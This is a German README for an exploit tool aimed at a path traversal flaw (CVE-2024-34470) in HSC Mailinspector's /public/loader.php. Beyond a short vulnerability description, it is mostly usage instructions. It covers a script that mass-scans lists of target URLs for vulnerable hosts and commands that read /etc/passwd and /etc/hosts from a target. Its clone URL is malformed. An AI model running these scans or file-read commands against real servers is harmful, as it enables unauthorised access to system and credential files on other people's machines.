
Eine kritische Sicherheitslücke wurde in HSC Mailinspector bis Version 5.2.18 gefunden. Diese Sicherheitslücke betrifft eine unbekannte Funktionalität der Datei /public/loader.php.
Es wurde eine kritische Sicherheitslücke in HSC Mailinspector bis Version 5.2.18 gefunden. Diese Schwachstelle betrifft eine unbekannte Funktionalität der Datei /public/loader.php. Durch Manipulation des Arguments 'path' mit einer unbekannten Eingabe kommt es zu einer Path-Traversal-Schwachstelle. Gemäß CWE wird dieses Problem als CWE-22 eingestuft. Das Produkt verwendet externe Eingaben, um einen Pfadnamen zu konstruieren, der eine Datei oder ein Verzeichnis unterhalb eines eingeschränkten übergeordneten Verzeichnisses identifizieren soll, neutralisiert jedoch spezielle Elemente im Pfadnamen nicht ordnungsgemäß, die dazu führen können, dass der Pfadname zu einem Ort außerhalb des eingeschränkten Verzeichnisses aufgelöst wird. Dies betrifft Vertraulichkeit, Integrität und Verfügbarkeit.
Repository klonen:
git clone https://CVE-2024-34470.git
cd CVE-2024-34470
Abhängigkeiten installieren
Stellen Sie sicher, dass Python und pip installiert sind. Führen Sie dann Folgendes aus:
pip install -r requirements.txt
Um eine Suche nach mehreren Zielen mithilfe einer Textdatei durchzuführen, verwenden Sie das Skript Massive_CVE-2024-34470.py
$ python3 Massive_CVE-2024-34470.py urls.txt urls_vulnerable.txt 2>/dev/null
Das Format, in dem die Datei urls.txt vorliegen sollte, ist wie folgt:
https://10.18.97.2
http://domain.com
https://192.8.7.2:4443
![[Screenshot_1.png]](https://github.com/Mr-r00t11/CVE-2024-34470/blob/main/img/Screenshot_1.png)
Sobald die anfälligen Ziele identifiziert wurden, verwenden wir das Skript CVE-2024-34470.py, um den angegebenen Inhalt auszunutzen und über das Terminal anzuzeigen.
# Inhalt der Datei passwd lesen
$ python CVE-2024-34470.py http://example.com /etc/passwd 2>/dev/null
# Inhalt der Datei hosts lesen
$ python CVE-2024-34470.py http://example.com /etc/hosts
![[screenshot_2.png]](https://github.com/Mr-r00t11/CVE-2024-34470/blob/main/img/Screenshot_2.png)